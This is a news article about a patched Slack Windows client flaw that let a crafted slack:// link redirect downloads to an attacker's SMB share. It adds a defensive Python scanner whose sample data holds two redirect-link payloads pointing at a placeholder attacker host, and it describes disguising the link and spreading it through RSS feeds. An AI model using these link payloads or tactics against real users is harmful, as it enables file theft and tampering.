A bug discovered in Slack, the workplace messaging app, may have allowed an attacker to intercept files downloaded from inside Slack’s Windows desktop client, according to security researchers.
An attacker would introduce a malicious link into a Slack channel that, if clicked, would silently alter the download-location setting of the victim’s client to a file server owned by the attacker, according to a researcher at Tenable, the Maryland-based cybersecurity firm.
The flaw was patched in Slack version 3.4.0, Tenable said. Users are advised to confirm that their Windows version of Slack is up to date.
Slack said the issue was reported by Tenable through its bug bounty program at HackerOne: “Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to [update] their apps and clients to the last available version.”
Tenable researcher David Wells said the bug “would allow all future downloaded documents by the victim to end up being uploaded to an attacker owned file server until the setting is manually changed back by the victim.” The attacker could not only steal any downloaded files with this method but could then modify them as well to include a malicious package. “The options from there on,” Wells wrote, “are endless.”
The discovery came as Wells was examining which Slack settings could be altered using “slack://” hyperlinks inside the client. A “slack://” link may include, for instance, “PrefSSBFileDownloadPath,” which allows for the download destination to be altered automatically if any user clicks the link. The new destination remains in place until the user manually changes it back.
Wells found that they could not redirect files to another location on the target’s computer, because the destination path in the “slack://” link can’t include a colon (:) character. They could, however, send the files to a shared location using Windows’ Server Message Block (SMB) protocol.
The link below, for example, if clicked by a user, would redirect any future files they download to the shared SMB server.
Wells notes that security-conscious users would be unlikely to click on such a link. It can be obscured, however, using Slack’s attachments feature, which allows for a text hyperlink. The linked text can even be modified, making it appear as if it leads to another domain, such as google.com.
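The two tells described above, a “slack://” link that carries the PrefSSBFileDownloadPath setting with a UNC (\\server\share) destination, and visible link text that claims a different host than the real target, are both cheap to check when triaging exported chat messages or links submitted by users. The following scanner is an added example written for this article, not code from Tenable or Slack. It assumes the preference travels inside the URL's query string (the exact layout of a settings link is an assumption here; the detector only looks for the preference name and a UNC path anywhere in the decoded URL), and every host in the sample data is a constructed placeholder.

```python
import re
from urllib.parse import urlsplit, unquote

# Preference name cited in Tenable's write-up. The exact slack:// URL layout that
# carries it is an assumption of this example, not taken from the Slack client.
DOWNLOAD_PATH_PREF = "PrefSSBFileDownloadPath"

# UNC share (\\host\share) as it appears raw, JSON-escaped (\\\\host\\share) or
# after percent-decoding; the share name ends at a quote, space, & or backslash.
UNC_RE = re.compile(r"\\{2,}([A-Za-z0-9.-]+)\\+([^\\\"'\s&]+)")

# A hostname at the start of the visible link text, with or without a scheme.
SHOWN_HOST_RE = re.compile(
    r"^(?:[a-z][a-z0-9+.-]*://)?([a-z0-9.-]+\.[a-z]{2,})(?=[/:\s]|$)")


def shown_host(display_text):
    """Return the hostname the link's visible text claims to lead to, if any."""
    m = SHOWN_HOST_RE.match(display_text.strip().lower())
    return m.group(1) if m else None


def inspect_link(display_text, href):
    """Return a list of findings for one (visible text, target URL) pair."""
    findings = []
    decoded = unquote(href)  # undo %5C-style encoding of backslashes and quotes
    parts = urlsplit(decoded)
    if parts.scheme.lower() == "slack" and DOWNLOAD_PATH_PREF.lower() in decoded.lower():
        findings.append(f"slack:// link changes {DOWNLOAD_PATH_PREF}")
        m = UNC_RE.search(decoded)
        if m:
            findings.append(
                f"download path points at UNC share \\\\{m.group(1)}\\{m.group(2)}")
    claimed = shown_host(display_text)
    real_host = (parts.hostname or "").lower()
    if claimed and claimed != real_host:
        findings.append(
            f"visible text claims {claimed} but target host is {real_host or parts.scheme}")
    return findings


def classify(display_text, href):
    """Map findings to a triage level: 'high', 'review' or 'ok'."""
    findings = inspect_link(display_text, href)
    if any(f.startswith("download path points at UNC") for f in findings):
        return "high", findings
    return ("review" if findings else "ok"), findings


# Constructed sample messages as (visible text, href); all hosts are placeholders.
SAMPLE_LINKS = [
    ("Q3 report", "https://files.example.com/q3.pdf"),
    ("https://google.com/drive/q3",
     r'slack://settings/?update={"PrefSSBFileDownloadPath":"\\\\fileserver.attacker.example\\drop"}'),
    ("open #general", "slack://channel?team=T000&id=C000"),
    ("files.example.com", "https://files.example.com/q3.pdf"),
    ("report",
     "slack://settings/?update=%7B%22PrefSSBFileDownloadPath%22%3A%22"
     "%5C%5Cfileserver.attacker.example%5Cdrop%22%7D"),
]


def scan(links=SAMPLE_LINKS):
    """Classify every link; returns (visible text, level, findings) per link."""
    return [(text, *classify(text, href)) for text, href in links]


if __name__ == "__main__":
    for text, level, findings in scan():
        print(f"[{level:6}] {text!r}")
        for finding in findings:
            print("         -", finding)
```

Only a slack:// link that both names the preference and carries a share path is rated high; an ordinary slack:// deep link such as the channel link in the sample produces no finding, and a display/target host mismatch on its own is rated for review rather than blocked, since legitimate shortened or redirecting links also trip it. Percent-encoded variants are decoded first so the same pattern catches both spellings.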
Wells also theorized, creatively, that attackers could introduce the malicious link into Slack channels that they aren’t part of or even aware of by using RSS feeds, since links from a feed may auto-populate inside Slack channels subscribed to it. For instance, an attacker could post on Reddit a normal-looking HTTP link that actually redirects to a malicious “slack://” link. Any Slack channel subscribed to that specific subreddit’s RSS feed would then see the link inside their chat.
“These attempts could be unmasked by savvy Slack users, however, if decades of phishing campaigns have taught us anything, it’s that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting,” Wells said.
Renaud Deraison, Tenable’s cofounder and chief technology officer, added that emerging technologies aimed at offering “seamless connectivity” can also leave organizations vulnerable. It’s important, they said, that companies realize added connectivity can also mean an expanded attack surface.